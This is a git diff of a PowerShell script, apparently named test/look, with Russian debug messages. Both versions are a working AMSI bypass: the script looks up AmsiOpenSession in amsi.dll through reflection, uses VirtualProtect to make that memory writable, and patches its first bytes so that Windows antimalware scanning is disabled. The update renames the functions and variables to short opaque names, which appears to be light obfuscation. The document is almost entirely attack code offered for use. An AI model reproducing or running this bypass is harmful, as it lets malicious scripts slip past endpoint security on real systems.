Update test/look

test/look

@@ -1,67 +1,61 @@
-function lookFuncAddr {
-    Param($moduleName, $functionName)
-    
-    Write-Host "[lookFuncAddr] Начало выполнения функции" -ForegroundColor Green
-    Write-Host "[lookFuncAddr] Параметры:ModuleName=$moduleName,FunctionName=$functionName" -ForegroundColor Cyan
-    
-    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
-        Where-Object {$_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
-    
-    Write-Host "[lookFuncAddr] Получена сборка: $($assem.Assembly.FullName)" -ForegroundColor Green
-    
-    $tmp=@()
-    $assem.GetMethods() | ForEach-Object{ 
-        If($_.Name -eq 'GetProcAddress') { 
-            $tmp+=$_ 
-            Write-Host "[lookFuncAddr] Найден метод GetProcAddress" -ForegroundColor Green
+function f {
+    Param($a, $b)
+    Write-Host "[f] Начало выполнения функции" -ForegroundColor Green
+    Write-Host "[f] Параметры: ModuleName=$a, FunctionName=$b" -ForegroundColor Cyan
+    $c = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -and $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+    Write-Host "[f] Получена сборка: $($c.Assembly.FullName)" -ForegroundColor Green
+    $d = @()
+    $c.GetMethods() | ForEach-Object {
+        if ($_.Name -eq 'GetProcAddress') {
+            $d += $_
+            Write-Host "[f] Найден метод GetProcAddress" -ForegroundColor Green
         }
     }
-    
-    Write-Host "[lookFuncAddr] Возврат результата" -ForegroundColor Green
-    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
+    Write-Host "[f] Возврат результата" -ForegroundColor Green
+    return $d[0].Invoke($null, @( ($c.GetMethod('GetModuleHandle')).Invoke($null, @($a)), $b ))
 }
 
-function getDelegateType {
+function g {
     Param(
-        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
-        [Parameter(Position = 1)] [Type] $delType = [Void]
+        [Parameter(Position=0, Mandatory=$true)]
+        [Type[]]$p,
+        [Parameter(Position=1)]
+        [Type]$q = [Void]
     )
-    
-    Write-Host "[getDelegateType] Начало выполнения функции" -ForegroundColor Green
-    Write-Host "[getDelegateType] Параметры:Func=$func,DelType=$delType" -ForegroundColor Cyan
-    
-    $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
+    Write-Host "[g] Начало выполнения функции" -ForegroundColor Green
+    Write-Host "[g] Параметры: Func=$p, DelType=$q" -ForegroundColor Cyan
+    $r = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
         [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType',
         'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
-    
-    Write-Host "[getDelegateType] Создан тип делегата: $type" -ForegroundColor Green
-    
-    $type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
-    $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
-    
-    Write-Host "[getDelegateType] Возврат созданного типа" -ForegroundColor Green
-    return $type.CreateType()
+    Write-Host "[g] Создан тип делегата: $r" -ForegroundColor Green
+    $r.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $p).SetImplementationFlags('Runtime, Managed')
+    $r.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $q, $p).SetImplementationFlags('Runtime, Managed')
+    Write-Host "[g] Возврат созданного типа" -ForegroundColor Green
+    return $r.CreateType()
 }
 
 Write-Host "[Main] Начало выполнения основного кода" -ForegroundColor Yellow
 
-[IntPtr]$amsiAddr = lookFuncAddr amsi.dll AmsiOpenSession
-Write-Host "[Main] Получен адрес AmsiOpenSession: $amsiAddr" -ForegroundColor Green
-
-$oldProtect = 0
-$vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((lookFuncAddr kernel32.dll VirtualProtect),
-    (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))
+# Вызов функции для получения адреса AmsiOpenSession
+[IntPtr]$s = f 'amsi.dll' 'AmsiOpenSession'
+Write-Host "[Main] Получен адрес AmsiOpenSession: $s" -ForegroundColor Green
 
+$o = 0
+# Создание делегата для VirtualProtect с передачей массива типов
+$v = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
+    (f 'kernel32.dll' 'VirtualProtect'),
+    (g @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool]))
+)
 Write-Host "[Main] Создан делегат для VirtualProtect" -ForegroundColor Green
 
-$vp.Invoke($amsiAddr, 3, 0x40, [ref]$oldProtect)
+$v.Invoke($s, 3, 0x40, [ref]$o)
 Write-Host "[Main] Изменены права доступа к памяти" -ForegroundColor Green
 
-$3b = [Byte[]] (0x48, 0x31, 0xC0)
-[System.Runtime.InteropServices.Marshal]::Copy($3b, 0, $amsiAddr, 3)
+$b = [Byte[]](0x48, 0x31, 0xC0)
+[System.Runtime.InteropServices.Marshal]::Copy($b, 0, $s, 3)
 Write-Host "[Main] Записаны байты в память" -ForegroundColor Green
 
-$vp.Invoke($amsiAddr, 3, 0x20, [ref]$oldProtect)
+$v.Invoke($s, 3, 0x20, [ref]$o)
 Write-Host "[Main] Восстановлены оригинальные права доступа" -ForegroundColor Green
 
-Write-Host "[Main] Завершение выполнения" -ForegroundColor Yellow
+Write-Host "[Main] Завершение выполнения" -ForegroundColor Yellow